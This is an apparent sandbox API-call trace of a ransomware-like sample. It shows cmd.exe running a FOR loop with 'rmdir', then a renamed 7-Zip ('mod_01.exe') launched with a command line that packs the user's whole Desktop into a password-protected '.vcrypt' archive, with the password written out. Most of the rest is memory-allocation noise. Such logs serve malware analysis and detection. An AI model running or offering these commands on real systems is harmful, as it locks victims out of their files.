(HeapHandle=0x410000, Flags=0x8, Size=0x44) returned 0x423380 [0057.515] GetProcessHeap () returned 0x410000 [0057.515] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x4233d0 [0057.516] GetProcessHeap () returned 0x410000 [0057.516] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4233d0, Size=0x12) returned 0x4233d0 [0057.516] GetProcessHeap () returned 0x410000 [0057.516] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4233d0) returned 0x12 [0057.516] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0057.516] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0057.516] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0057.516] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0057.516] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0057.516] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0057.517] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0057.517] GetProcessHeap () returned 0x410000 [0057.517] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x12) returned 0x4233f0 [0057.517] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0057.518] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0057.518] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0057.518] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0057.518] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0057.518] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0057.518] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0057.518] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0057.518] GetProcessHeap () returned 0x410000 [0057.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x423410 [0057.518] GetProcessHeap () returned 0x410000 [0057.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x423470 [0057.518] GetProcessHeap () returned 0x410000 [0057.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x20) returned 0x4257e0 [0057.520] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0057.522] GetFullPathNameW (in: lpFileName="D:", nBufferLength=0x208, lpBuffer=0x18f8f8, lpFilePart=0x18f6a4 | out: lpBuffer="D:\\", lpFilePart=0x18f6a4*=0x0) returned 0x3 [0057.522] wcsncmp (_String1="D:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -24 [0057.527] GetFileAttributesW (lpFileName="D:\\" (normalized: "d:")) returned 0xffffffff [0057.527] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.527] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0057.527] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.527] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0057.527] _get_osfhandle (_FileHandle=0) returned 0x3 [0057.527] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0057.528] SetConsoleInputExeNameW () returned 0x1 [0057.528] GetConsoleOutputCP () returned 0x1b5 [0057.528] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0057.528] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.528] exit (_Code=0) Process: id = "24" image_name = "mod_01.exe" filename = "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\mod_01.exe" page_root = "0x44032000" os_pid = "0x888" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x55c" cmd_line = "\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 29 os_tid = 0x898 [0057.652] __set_app_type (_Type=0x1) [0057.652] __p__fmode () returned 0x770331f4 [0057.652] __p__commode () returned 0x770331fc [0057.653] __getmainargs (in: _Argc=0x22fc54, _Argv=0x22fc44, _Env=0x22fc50, _DoWildCard=0, _StartInfo=0x22fc48 | out: _Argc=0x22fc54, _Argv=0x22fc44, _Env=0x22fc50) returned 0 [0057.654] _onexit (_Func=0x351cce) returned 0x351cce [0057.835] _onexit (_Func=0x351e18) returned 0x351e18 [0057.835] _onexit (_Func=0x351e4d) returned 0x351e4d [0057.837] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0057.837] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstStreamW") returned 0x76dbb4f4 [0057.837] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0057.837] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextStreamW") returned 0x76dbb371 [0057.837] _onexit (_Func=0x3823b6) returned 0x3823b6 [0057.837] _onexit (_Func=0x382f9e) returned 0x382f9e [0057.838] _onexit (_Func=0x384948) returned 0x384948 [0057.838] _onexit (_Func=0x38ba98) returned 0x38ba98 [0057.838] _onexit (_Func=0x3c3c40) returned 0x3c3c40 [0057.839] _onexit (_Func=0x3c3cc0) returned 0x3c3cc0 [0057.839] GetVersionExW (in: lpVersionInformation=0x22fad8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x22fa70, dwMinorVersion=0x77c7019b, dwBuildNumber=0x22fbe8, dwPlatformId=0x77cb1ecd, szCSDVersion="㊱\x13￾￿矆矆??") | out: lpVersionInformation=0x22fad8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0057.839] _onexit (_Func=0x3c5460) returned 0x3c5460 [0057.839] __p___initenv () returned 0x770304e8 [0057.839] GetVersionExW (in: lpVersionInformation=0x22fa90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7ffa3203, dwMinorVersion=0x1fcbfbff, dwBuildNumber=0x1, dwPlatformId=0x66001e, szCSDVersion="\x04") | out: lpVersionInformation=0x22fa90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0057.839] SetConsoleCtrlHandler (HandlerRoutine=0x3844de, Add=1) returned 1 [0057.840] SetFileApisToOEM () [0057.840] GetCommandLineW () returned="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*\" " [0057.840] malloc (_Size=0x1b4) returned 0x2711a0 [0057.840] malloc (_Size=0x1b4) returned 0x272868 [0057.840] malloc (_Size=0x8) returned 0x271360 [0057.840] malloc (_Size=0x8) returned 0x271370 [0057.840] malloc (_Size=0x20) returned 0x271380 [0057.840] free (_Block=0x271360) [0057.840] malloc (_Size=0x40) returned 0x2713a8 [0057.840] free (_Block=0x271380) [0057.840] malloc (_Size=0x60) returned 0x272a28 [0057.840] free (_Block=0x2713a8) [0057.840] malloc (_Size=0x14e) returned 0x272a90 [0057.840] free (_Block=0x271370) [0057.840] malloc (_Size=0xc) returned 0x271360 [0057.840] malloc (_Size=0x60) returned 0x271378 [0057.840] malloc (_Size=0x4) returned 0x2713e0 [0057.840] free (_Block=0x0) [0057.840] free (_Block=0x272a90) [0057.840] free (_Block=0x272a28) [0057.840] malloc (_Size=0x8) returned 0x2713f0 [0057.840] malloc (_Size=0x8) returned 0x271400 [0057.840] malloc (_Size=0x14c) returned 0x272a28 [0057.840] free (_Block=0x271400) [0057.840] free (_Block=0x272a28) [0057.840] free (_Block=0x2713f0) [0057.840] malloc (_Size=0x8) returned 0x2713f0 [0057.841] malloc (_Size=0x8) returned 0x271400 [0057.841] malloc (_Size=0x148) returned 0x272a28 [0057.841] free (_Block=0x271400) [0057.841] malloc (_Size=0xc) returned 0x271400 [0057.841] malloc (_Size=0x4) returned 0x272b78 [0057.841] malloc (_Size=0x8) returned 0x272b88 [0057.841] free (_Block=0x2713e0) [0057.841] free (_Block=0x272a28) [0057.841] free (_Block=0x2713f0) [0057.841] malloc (_Size=0x8) returned 0x2713e0 [0057.841] malloc (_Size=0x8) returned 0x2713f0 [0057.841] malloc (_Size=0x20) returned 0x272a28 [0057.841] free (_Block=0x2713e0) [0057.841] malloc (_Size=0x13e) returned 0x272b98 [0057.841] free (_Block=0x2713f0) [0057.841] malloc (_Size=0xc) returned 0x2713e0 [0057.841] malloc (_Size=0xa) returned 0x272a50 [0057.841] malloc (_Size=0xc) returned 0x272a68 [0057.841] free (_Block=0x272b88) [0057.841] free (_Block=0x272b98) [0057.841] free (_Block=0x272a28) [0057.841] malloc (_Size=0x8) returned 0x272a28 [0057.841] malloc (_Size=0x8) returned 0x272a38 [0057.841] malloc (_Size=0x138) returned 0x272b88 [0057.841] free (_Block=0x272a38) [0057.841] malloc (_Size=0xc) returned 0x272a38 [0057.841] malloc (_Size=0x6) returned 0x272a80 [0057.841] malloc (_Size=0x10) returned 0x272a90 [0057.841] free (_Block=0x272a68) [0057.842] free (_Block=0x272b88) [0057.842] free (_Block=0x272a28) [0057.842] malloc (_Size=0x8) returned 0x272a28 [0057.842] malloc (_Size=0x8) returned 0x272a68 [0057.842] malloc (_Size=0x20) returned 0x272aa8 [0057.842] free (_Block=0x272a28) [0057.842] malloc (_Size=0x12e) returned 0x272b88 [0057.842] free (_Block=0x272a68) [0057.842] malloc (_Size=0xc) returned 0x272a68 [0057.842] malloc (_Size=0xa) returned 0x272ad0 [0057.842] malloc (_Size=0x18) returned 0x272ae8 [0057.842] free (_Block=0x272a90) [0057.842] free (_Block=0x272b88) [0057.842] free (_Block=0x272aa8) [0057.842] malloc (_Size=0x8) returned 0x272a28 [0057.842] malloc (_Size=0x8) returned 0x272a90 [0057.842] malloc (_Size=0x20) returned 0x272aa0 [0057.842] free (_Block=0x272a28) [0057.842] malloc (_Size=0x40) returned 0x272b08 [0057.842] free (_Block=0x272aa0) [0057.842] malloc (_Size=0x60) returned 0x272b88 [0057.842] free (_Block=0x272b08) [0057.842] malloc (_Size=0xdc) returned 0x272bf0 [0057.842] free (_Block=0x272a90) [0057.842] malloc (_Size=0xc) returned 0x272a90 [0057.842] malloc (_Size=0x52) returned 0x272b08 [0057.842] free (_Block=0x272bf0) [0057.842] free (_Block=0x272b88) [0057.842] malloc (_Size=0x8) returned 0x272b68 [0057.842] malloc (_Size=0x8) returned 0x272a28 [0057.842] malloc (_Size=0x20) returned 0x272aa8 [0057.842] free (_Block=0x272b68) [0057.842] malloc (_Size=0x40) returned 0x272b88 [0057.842] free (_Block=0x272aa8) [0057.842] malloc (_Size=0x60) returned 0x272bd0 [0057.842] free (_Block=0x272b88) [0057.842] malloc (_Size=0xa0) returned 0x272c38 [0057.842] free (_Block=0x272bd0) [0057.843] malloc (_Size=0x54) returned 0x272b88 [0057.843] free (_Block=0x272a28) [0057.843] malloc (_Size=0xc) returned 0x272aa8 [0057.843] malloc (_Size=0x84) returned 0x272ce0 [0057.843] malloc (_Size=0x20) returned 0x272be8 [0057.843] free (_Block=0x272ae8) [0057.843] free (_Block=0x272b88) [0057.843] free (_Block=0x272c38) [0057.843] malloc (_Size=0x8) returned 0x272ac0 [0057.843] malloc (_Size=0x8) returned 0x272a28 [0057.843] malloc (_Size=0x20) returned 0x272b88 [0057.843] free (_Block=0x272ac0) [0057.843] malloc (_Size=0x40) returned 0x272c10 [0057.843] free (_Block=0x272b88) [0057.843] malloc (_Size=0x60) returned 0x272c58 [0057.843] free (_Block=0x272c10) [0057.843] malloc (_Size=0xc) returned 0x272cc0 [0057.843] malloc (_Size=0x50) returned 0x272b88 [0057.843] free (_Block=0x272a28) [0057.843] free (_Block=0x272c58) [0057.843] free (_Block=0x272868) [0057.843] free (_Block=0x2711a0) [0057.843] free (_Block=0x271378) [0057.843] free (_Block=0x271360) [0057.843] malloc (_Size=0x8) returned 0x272ac0 [0057.843] malloc (_Size=0x8) returned 0x272b68 [0057.843] malloc (_Size=0x8) returned 0x272ae8 [0057.843] malloc (_Size=0x8) returned 0x272af8 [0057.843] malloc (_Size=0x8) returned 0x272c10 [0057.844] malloc (_Size=0x8) returned 0x272c20 [0057.844] malloc (_Size=0x8) returned 0x272c30 [0057.844] malloc (_Size=0x8) returned 0x272c40 [0057.844] malloc (_Size=0x8) returned 0x272c50 [0057.844] malloc (_Size=0x8) returned 0x272c60 [0057.844] malloc (_Size=0x8) returned 0x272c70 [0057.844] malloc (_Size=0x8) returned 0x272c80 [0057.844] malloc (_Size=0x8) returned 0x272c90 [0057.844] malloc (_Size=0x8) returned 0x272ca0 [0057.845] malloc (_Size=0x8) returned 0x27d5f0 [0057.845] malloc (_Size=0x8) returned 0x27d600 [0057.845] malloc (_Size=0x8) returned 0x27d610 [0057.845] malloc (_Size=0x4) returned 0x27d620 [0057.845] malloc (_Size=0x8) returned 0x27d630 [0057.845] malloc (_Size=0x428) returned 0x27ddd8 [0057.845] malloc (_Size=0xc) returned 0x272868 [0057.845] malloc (_Size=0x4) returned 0x27d640 [0057.845] malloc (_Size=0x4) returned 0x27d650 [0057.845] free (_Block=0x0) [0057.845] malloc (_Size=0x6) returned 0x27d660 [0057.845] malloc (_Size=0xc) returned 0x272880 [0057.845] malloc (_Size=0x6) returned 0x27d670 [0057.845] malloc (_Size=0x4) returned 0x27d680 [0057.845] free (_Block=0x0) [0057.845] free (_Block=0x27d660) [0057.845] malloc (_Size=0x6) returned 0x27d660 [0057.845] malloc (_Size=0xc) returned 0x272898 [0057.845] malloc (_Size=0x6) returned 0x27d690 [0057.846] malloc (_Size=0x4) returned 0x27d6a0 [0057.846] free (_Block=0x0) [0057.846] free (_Block=0x27d660) [0057.846] malloc (_Size=0x4e) returned 0x2728b0 [0057.846] malloc (_Size=0xc) returned 0x272908 [0057.846] malloc (_Size=0x4e) returned 0x272920 [0057.846] malloc (_Size=0x4) returned 0x27d660 [0057.846] free (_Block=0x0) [0057.846] free (_Block=0x2728b0) [0057.846] malloc (_Size=0xc) returned 0x2728b0 [0057.846] malloc (_Size=0x84) returned 0x272978 [0057.846] malloc (_Size=0x8) returned 0x27d6b0 [0057.846] free (_Block=0x27d650) [0057.846] malloc (_Size=0xc) returned 0x272a08 [0057.846] malloc (_Size=0x50) returned 0x2711a0 [0057.846] malloc (_Size=0xc) returned 0x272a20 [0057.846] free (_Block=0x27d6b0) [0057.846] _fileno (_File=0x77032900) returned 0 [0057.846] _isatty (_FileHandle=0) returned 64 [0057.846] _fileno (_File=0x77032920) returned 1 [0057.846] _isatty (_FileHandle=1) returned 64 [0057.846] _fileno (_File=0x77032940) returned 2 [0057.846] _isatty (_FileHandle=2) returned 64 [0057.846] GetCurrentProcess () returned 0xffffffff [0057.846] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x22f598 | out: TokenHandle=0x22f598*=0x80) returned 1 [0057.847] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeRestorePrivilege", lpLuid=0x22f58c | out: lpLuid=0x22f58c*(LowPart=0x12, HighPart=0)) returned 1 [0057.858] AdjustTokenPrivileges (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x22f588*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0057.858] GetLastError () returned 0x0 [0057.858] CloseHandle (hObject=0x80) returned 1 [0057.858] GetCurrentProcess () returned 0xffffffff [0057.858] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x22f59c | out: TokenHandle=0x22f59c*=0x80) returned 1 [0057.858] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeCreateSymbolicLinkPrivilege", lpLuid=0x22f590 | out: lpLuid=0x22f590*(LowPart=0x23, HighPart=0)) returned 1 [0057.859] AdjustTokenPrivileges (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x22f58c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0057.859] GetLastError () returned 0x0 [0057.859] CloseHandle (hObject=0x80) returned 1 [0057.859] fputs (in: _Str="\n7-Zip (a) 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30\n\n", _File=0x77032920 | out: _File=0x77032920) returned 0 [0057.860] malloc (_Size=0x4) returned 0x27d6b0 [0057.861] free (_Block=0x27d6b0) [0057.861] malloc (_Size=0x84) returned 0x2711f8 [0057.861] free (_Block=0x272ac0) [0057.861] malloc (_Size=0x10) returned 0x2728c8 [0057.861] malloc (_Size=0x8) returned 0x27d6b0 [0057.861] malloc (_Size=0x4) returned 0x27d650 [0057.861] free (_Block=0x0) [0057.861] malloc (_Size=0x50) returned 0x271288 [0057.861] free (_Block=0x27d6b0) [0057.861] malloc (_Size=0x4e) returned 0x2712e0 [0057.861] free (_Block=0x272b68) [0057.861] malloc (_Size=0x8) returned 0x27d6b0 [0057.861] malloc (_Size=0x8) returned 0x27d6c0 [0057.861] malloc (_Size=0x18) returned 0x2728e0 [0057.861] malloc (_Size=0x6) returned 0x27d6d0 [0057.861] malloc (_Size=0x2) returned 0x27d6e0 [0057.861] malloc (_Size=0x4) returned 0x27d6f0 [0057.861] free (_Block=0x0) [0057.861] free (_Block=0x27d6c0) [0057.861] free (_Block=0x27d6b0) [0057.861] malloc (_Size=0x8) returned 0x27d6b0 [0057.861] malloc (_Size=0x8) returned 0x27d6c0 [0057.861] malloc (_Size=0x8) returned 0x27d700 [0057.861] malloc (_Size=0x8) returned 0x27d710 [0057.861] malloc (_Size=0x8) returned 0x27d720 [0057.861] malloc (_Size=0x8) returned 0x27d730 [0057.861] malloc (_Size=0x8) returned 0x27d740 [0057.861] malloc (_Size=0x8) returned 0x27d750 [0057.862] malloc (_Size=0x80) returned 0x271338 [0057.862] malloc (_Size=0x2) returned 0x27d760 [0057.862] malloc (_Size=0x2) returned 0x27d770 [0057.862] malloc (_Size=0x2) returned 0x27d780 [0057.862] malloc (_Size=0x2) returned 0x27d790 [0057.862] malloc (_Size=0x2) returned 0x27d7a0 [0057.862] malloc (_Size=0x2) returned 0x27d7b0 [0057.862] malloc (_Size=0x2) returned 0x27d7c0 [0057.862] malloc (_Size=0x2) returned 0x27d7d0 [0057.862] malloc (_Size=0x4) returned 0x27d7e0 [0057.862] free (_Block=0x0) [0057.862] free (_Block=0x27d750) [0057.862] free (_Block=0x27d740) [0057.862] free (_Block=0x27d730) [0057.862] free (_Block=0x27d720) [0057.862] free (_Block=0x27d710) [0057.862] free (_Block=0x27d700) [0057.862] free (_Block=0x27d6c0) [0057.862] free (_Block=0x27d6b0) [0057.862] malloc (_Size=0x4) returned 0x27d6b0 [0057.862] free (_Block=0x0) [0057.862] malloc (_Size=0x18) returned 0x2713c0 [0057.862] malloc (_Size=0x6) returned 0x27d6c0 [0057.862] malloc (_Size=0x2) returned 0x27d700 [0057.862] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.862] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22fb2c | out: lpConsoleScreenBufferInfo=0x22fb2c) returned 1 [0057.863] malloc (_Size=0x18) returned 0x27f210 [0057.863] malloc (_Size=0x8) returned 0x27d710 [0057.863] malloc (_Size=0xc) returned 0x27f230 [0057.863] free (_Block=0x27d710) [0057.863] malloc (_Size=0x8) returned 0x27d710 [0057.863] malloc (_Size=0x8) returned 0x27d720 [0057.863] malloc (_Size=0x26) returned 0x27f248 [0057.863] free (_Block=0x27d710) [0057.863] malloc (_Size=0x1c) returned 0x27f278 [0057.863] free (_Block=0x27d720) [0057.863] malloc (_Size=0x8) returned 0x27d720 [0057.863] malloc (_Size=0xc) returned 0x27f2a0 [0057.863] malloc (_Size=0x8) returned 0x27d710 [0057.863] malloc (_Size=0x4) returned 0x27d730 [0057.863] free (_Block=0x0) [0057.863] malloc (_Size=0x20) returned 0x27f2b8 [0057.863] free (_Block=0x27d720) [0057.863] malloc (_Size=0xc) returned 0x27f2f8 [0057.863] malloc (_Size=0xc) returned 0x27f310 [0057.863] malloc (_Size=0x8) returned 0x27d720 [0057.863] free (_Block=0x27d730) [0057.863] malloc (_Size=0xc) returned 0x27f328 [0057.863] malloc (_Size=0xa) returned 0x27f340 [0057.863] malloc (_Size=0xc) returned 0x27f358 [0057.863] free (_Block=0x27d720) [0057.863] malloc (_Size=0xc) returned 0x27f370 [0057.863] malloc (_Size=0x8) returned 0x27d720 [0057.863] malloc (_Size=0x10) returned 0x27f388 [0057.863] free (_Block=0x27f358) [0057.863] free (_Block=0x27f2b8) [0057.863] malloc (_Size=0x8) returned 0x27d730 [0057.863] malloc (_Size=0xc) returned 0x27f358 [0057.863] malloc (_Size=0x4) returned 0x27d740 [0057.863] malloc (_Size=0x4) returned 0x27d750 [0057.864] free (_Block=0x0) [0057.864] malloc (_Size=0xc) returned 0x27f3a0 [0057.864] malloc (_Size=0x4) returned 0x27d7f0 [0057.864] malloc (_Size=0x8) returned 0x27d800 [0057.864] free (_Block=0x27d750) [0057.864] malloc (_Size=0x20) returned 0x27f2b8 [0057.864] free (_Block=0x27d730) [0057.864] malloc (_Size=0xc) returned 0x27f3b8 [0057.864] malloc (_Size=0xa) returned 0x27f3d0 [0057.864] malloc (_Size=0xc) returned 0x27f3e8 [0057.864] free (_Block=0x27d800) [0057.864] malloc (_Size=0xc) returned 0x27f400 [0057.864] malloc (_Size=0xa) returned 0x27f418 [0057.864] malloc (_Size=0x10) returned 0x27f430 [0057.864] free (_Block=0x27f3e8) [0057.864] free (_Block=0x27f2b8) [0057.864] malloc (_Size=0x8) returned 0x27d800 [0057.864] malloc (_Size=0x8) returned 0x27d730 [0057.864] wcscmp (_String1="*", _String2="*") returned 0 [0057.864] malloc (_Size=0x18) returned 0x27f2b8 [0057.864] malloc (_Size=0x8) returned 0x27d750 [0057.864] malloc (_Size=0x2) returned 0x27d810 [0057.864] malloc (_Size=0x4) returned 0x27d820 [0057.864] free (_Block=0x0) [0057.864] free (_Block=0x27d730) [0057.864] free (_Block=0x27d800) [0057.864] malloc (_Size=0x8) returned 0x27d800 [0057.864] malloc (_Size=0x8) returned 0x27d730 [0057.864] malloc (_Size=0xc) returned 0x27f3e8 [0057.864] free (_Block=0x27d800) [0057.865] wcscmp (_String1="*", _String2="*") returned 0 [0057.865] malloc (_Size=0x18) returned 0x27f6e0 [0057.865] malloc (_Size=0xc) returned 0x27f448 [0057.865] malloc (_Size=0x2) returned 0x27d800 [0057.865] malloc (_Size=0x8) returned 0x27d830 [0057.865] free (_Block=0x27d820) [0057.865] free (_Block=0x27d730) [0057.865] free (_Block=0x27f3e8) [0057.865] malloc (_Size=0x8) returned 0x27d730 [0057.865] malloc (_Size=0x8) returned 0x27d820 [0057.865] malloc (_Size=0xa) returned 0x27f3e8 [0057.865] free (_Block=0x27d730) [0057.865] malloc (_Size=0xa) returned 0x27f460 [0057.865] free (_Block=0x27d820) [0057.865] wcscmp (_String1=".tar", _String2="*") returned 1 [0057.865] malloc (_Size=0x18) returned 0x27f700 [0057.865] malloc (_Size=0xa) returned 0x27f478 [0057.865] malloc (_Size=0xa) returned 0x27f490 [0057.865] malloc (_Size=0xc) returned 0x27f4a8 [0057.865] free (_Block=0x27d830) [0057.865] free (_Block=0x27f460) [0057.865] free (_Block=0x27f3e8) [0057.865] malloc (_Size=0x8) returned 0x27d830 [0057.865] malloc (_Size=0x8) returned 0x27d820 [0057.865] malloc (_Size=0xa) returned 0x27f3e8 [0057.865] free (_Block=0x27d820) [0057.866] wcscmp (_String1=".tar", _String2="*") returned 1 [0057.866] malloc (_Size=0x18) returned 0x27f720 [0057.866] malloc (_Size=0x8) returned 0x27d820 [0057.866] malloc (_Size=0xa) returned 0x27f460 [0057.866] malloc (_Size=0x10) returned 0x27f4c0 [0057.866] free (_Block=0x27f4a8) [0057.866] free (_Block=0x27f3e8) [0057.866] free (_Block=0x27d830) [0057.866] free (_Block=0x27f418) [0057.866] free (_Block=0x27f400) [0057.866] free (_Block=0x27f3d0) [0057.866] free (_Block=0x27f3b8) [0057.866] free (_Block=0x27d7f0) [0057.866] free (_Block=0x27f3a0) [0057.866] free (_Block=0x27d740) [0057.866] free (_Block=0x27f358) [0057.866] free (_Block=0x27f430) [0057.866] free (_Block=0x27d720) [0057.866] free (_Block=0x27f370) [0057.866] free (_Block=0x27f340) [0057.866] free (_Block=0x27f328) [0057.866] free (_Block=0x27f310) [0057.866] free (_Block=0x27f2f8) [0057.866] free (_Block=0x27d710) [0057.866] free (_Block=0x27f2a0) [0057.866] free (_Block=0x27f388) [0057.866] free (_Block=0x27f278) [0057.866] free (_Block=0x27f248) [0057.866] malloc (_Size=0x8) returned 0x27d710 [0057.866] malloc (_Size=0x4) returned 0x27d720 [0057.866] free (_Block=0x0) [0057.866] malloc (_Size=0x3) returned 0x27d740 [0057.866] malloc (_Size=0x3c) returned 0x27f248 [0057.866] malloc (_Size=0xc) returned 0x27f388 [0057.866] malloc (_Size=0x10) returned 0x27f2f8 [0057.867] malloc (_Size=0x18) returned 0x27f290 [0057.867] malloc (_Size=0x8) returned 0x27d7f0 [0057.867] malloc (_Size=0x2) returned 0x27d830 [0057.867] malloc (_Size=0x18) returned 0x27f740 [0057.867] malloc (_Size=0xc) returned 0x27f310 [0057.867] malloc (_Size=0x2) returned 0x27d730 [0057.867] malloc (_Size=0x18) returned 0x27f760 [0057.867] malloc (_Size=0xa) returned 0x27f328 [0057.867] malloc (_Size=0xa) returned 0x27f340 [0057.867] malloc (_Size=0x18) returned 0x27f780 [0057.867] malloc (_Size=0x8) returned 0x27d840 [0057.867] malloc (_Size=0xa) returned 0x27f370 [0057.867] malloc (_Size=0x4) returned 0x27d850 [0057.867] malloc (_Size=0x8) returned 0x27d860 [0057.867] malloc (_Size=0x3) returned 0x27d870 [0057.867] malloc (_Size=0x4) returned 0x27d880 [0057.867] free (_Block=0x0) [0057.867] free (_Block=0x27d740) [0057.867] free (_Block=0x27d710) [0057.867] free (_Block=0x27d720) [0057.867] free (_Block=0x27f460) [0057.867] free (_Block=0x27d820) [0057.867] free (_Block=0x27f720) [0057.867] free (_Block=0x27f490) [0057.867] free (_Block=0x27f478) [0057.867] free (_Block=0x27f700) [0057.867] free (_Block=0x27d800) [0057.867] free (_Block=0x27f448) [0057.867] free (_Block=0x27f6e0) [0057.867] free (_Block=0x27d810) [0057.867] free (_Block=0x27d750) [0057.867] free (_Block=0x27f2b8) [0057.867] free (_Block=0x27f4c0) [0057.867] free (_Block=0x27f230) [0057.868] malloc (_Size=0x8) returned 0x27d750 [0057.868] malloc (_Size=0xa) returned 0x27f4c0 [0057.868] free (_Block=0x27d750) [0057.868] malloc (_Size=0x8) returned 0x27d750 [0057.868] malloc (_Size=0x8) returned 0x27d810 [0057.868] malloc (_Size=0x28) returned 0x27f6e0 [0057.868] free (_Block=0x27d750) [0057.868] malloc (_Size=0x26) returned 0x27f710 [0057.868] free (_Block=0x27d810) [0057.868] malloc (_Size=0x8) returned 0x27d810 [0057.868] malloc (_Size=0xc) returned 0x27f448 [0057.868] malloc (_Size=0x6) returned 0x27d750 [0057.868] malloc (_Size=0x4) returned 0x27d800 [0057.868] free (_Block=0x0) [0057.868] malloc (_Size=0x20) returned 0x27f2b8 [0057.868] free (_Block=0x27d810) [0057.868] malloc (_Size=0xc) returned 0x27f478 [0057.868] malloc (_Size=0xa) returned 0x27f490 [0057.868] malloc (_Size=0x8) returned 0x27d810 [0057.868] free (_Block=0x27d800) [0057.868] malloc (_Size=0xc) returned 0x27f460 [0057.868] malloc (_Size=0x8) returned 0x27d800 [0057.868] malloc (_Size=0xc) returned 0x27f430 [0057.868] free (_Block=0x27d810) [0057.868] malloc (_Size=0xc) returned 0x27f358 [0057.868] malloc (_Size=0x8) returned 0x27d810 [0057.868] malloc (_Size=0x10) returned 0x27f3a0 [0057.868] free (_Block=0x27f430) [0057.868] malloc (_Size=0xc) returned 0x27f430 [0057.868] malloc (_Size=0x8) returned 0x27d820 [0057.868] malloc (_Size=0x18) returned 0x27f7a0 [0057.869] free (_Block=0x27f3a0) [0057.869] free (_Block=0x27f2b8) [0057.869] malloc (_Size=0x8) returned 0x27d720 